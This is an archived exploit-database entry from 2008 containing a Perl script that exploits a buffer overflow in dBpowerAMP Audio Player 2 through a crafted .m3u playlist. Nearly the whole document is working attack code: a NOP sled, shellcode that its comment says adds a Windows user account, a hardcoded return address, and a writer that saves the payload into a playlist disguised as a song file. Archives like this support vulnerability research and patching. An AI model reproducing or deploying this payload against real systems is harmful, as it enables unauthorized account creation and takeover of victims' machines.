dBpowerAMP Audio Player 2 - '.m3u' Remote Buffer Overflow

EDB-ID:

5069

Author:

securfrog

Type:

remote

Platform:

Windows

Published:

2008-02-06

####################################################################
#
# dBpowerAMP Audio Player Release 2 Remote Buffer Overflow Exploit
#
#
#
#
#
#
#
$nop= "\x90" x 65;
#
# win32_exec - CMD=cmd /k net user /add secur frog Size=188 http://metasploit.comhttp://metasploit.com 253
#
my $shellcode =
"\x29\xc9\x83\xe9\xd7\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x6c".
"\x91\xfa\x54\x83\xeb\xfc\xe2\xf4\x90\x79\xbe\x54\x6c\x91\x71\x11".
"\x50\x1a\x86\x51\x14\x90\x15\xdf\x23\x89\x71\x0b\x4c\x90\x11\x1d".
"\xe7\xa5\x71\x55\x82\xa0\x3a\xcd\xc0\x15\x3a\x20\x6b\x50\x30\x59".
"\x6d\x53\x11\xa0\x57\xc5\xde\x50\x19\x74\x71\x0b\x48\x90\x11\x32".
"\xe7\x9d\xb1\xdf\x33\x8d\xfb\xbf\xe7\x8d\x71\x55\x87\x18\xa6\x70".
"\x68\x52\xcb\x94\x08\x1a\xba\x64\xe9\x51\x82\x58\xe7\xd1\xf6\xdf".
"\x1c\x8d\x57\xdf\x04\x99\x11\x5d\xe7\x11\x4a\x54\x6c\x91\x71\x3c".
"\x50\xce\xcb\xa2\x0c\xc7\x73\xac\xef\x51\x81\x04\x04\x61\x70\x50".
"\x33\xf9\x62\xaa\xe6\x9f\xad\xab\x8b\xf2\x97\x30\x4c\xbe\x91\x74".
"\x02\xf4\x8e\x74\x19\xe2\x9f\x26\x4c\xbe\x9b\x30\x08\xb1\x89\x31".
"\x0f\xe4\x88\x74\x0a\xe3\x95\x33\x6c\x91\xfa\x54";
#
$eip = "\xe0\xec\xb8\x00";
#
$payload = "http://".$nop.$shellcode.$eip;
#
#
my $file="bob_marley_I_Shot_The_Sheriff.m3u";
#
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $payload;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";

# milw0rm.com [2008-02-06]